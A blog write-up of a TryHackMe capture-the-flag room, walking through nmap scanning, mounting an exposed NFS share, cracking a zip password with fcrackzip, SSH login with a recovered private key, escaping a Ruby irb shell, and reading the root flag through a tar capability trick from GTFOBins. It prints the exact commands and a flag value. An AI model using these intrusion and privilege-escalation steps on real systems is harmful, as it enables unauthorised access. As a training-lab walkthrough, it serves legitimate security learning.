The platform develops virtual
classrooms that not only allow users to deploy training environments with
the click of a button, but also reinforce learning by adding a
question-answer approach. Its a comfortable experience to learn using
pre-designed courses which
include virtual machines (VM) hosted in the cloud.
tryhackme RP Crack The Hash
While using a question-answer
model does make learning easier, TryHackMe allows users to create their own
virtual classrooms to teach particular topics enabling them to become
teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
TryHackMe Room :-
Click Here
Looking at the description of the room it says about starting from 1337
First we start scanning with nmap banner grabbing, nmap scan the IP we have
- 111 (rpcbind), 1137 (probably telnet/trim?), 2049 (nfs), 3333(ssh)
We can futher enumrate rpc and nfs -
To know which folder has the server available to mount we an ask it using-
showmount -e IP
sudo showmount -e 10.10.34.91
- mkdir nfs
- sudo mount -t nfs 10.10.34.91:/home/nfs nfs
- cd nfs
- ls
- unzip backup.zip
But it asks for a password, lets crack it
Fcrackzip
Now lets use this to bruteforce archive’s password
- sudo fcrackzip -u -D -p /home/hackerboy/Documents/rockyou.txt
But I can’t get to extract the files becasue read-only file system , so I used GUI to view what was in these files
open flag.txt file :- thm{h0p3_y0u_l1k3d_th3_f1r3w4ll}
And I was able to grab the flag,hint and ssh private key.
Now hint.txt says
2500-4500
I tried to ssh into the box using hades private but ssh port was not on 22
From the results of the scan I searched for ssh with openssh client ( Port
333 )
sudo ssh hades@10.10.34.91 -i id_rsa -p 3333
Welcome to hell. We hope you enjoy your stay!
irb(main):001:0> puts 'hello'
hello
=> nil
irb(main):002:0>
Now this irb is interactive ruby shell just like we get in python so in
order to get a /bin/bash shell run
exec '/bin/bash'
whoami
ls
cat user.txt
Privilege Escalation
- After sshing we got some kind of shell (not bash or sh), after searching for irb we get it's a ruby shell
- we can run system commands by- system("command-here"), we can also spawn bash using -
- exec "/bin/bash" and can see the user flag -
- We can see we don't have write permissions, so we can't upload scripts to check for attack vector
- We have to manually check for ways to privilege escalation -
1) we don't have password for hades so we can't use commands containing
sudo (eg. sudo -l)
2) we can list files with SUID by - find / -type
f -perm /4000 2>>/dev/null (we got a very big list but we don't have a
lead)
Now the room gives us a hint about getcap this command tells that which file
or binary has capability to access almost anything on the system so run
3)
getcap -r 2>/dev/null (2>/dev/null ,here 2 just redirects Standard
output error to null )
getcap -r / 2>/dev/null
Visiting GTFOBINS
https://gtfobins.github.io/gtfobins/tar/
tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
Disclaimer
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!
All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-
0 comments:
Post a Comment
For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.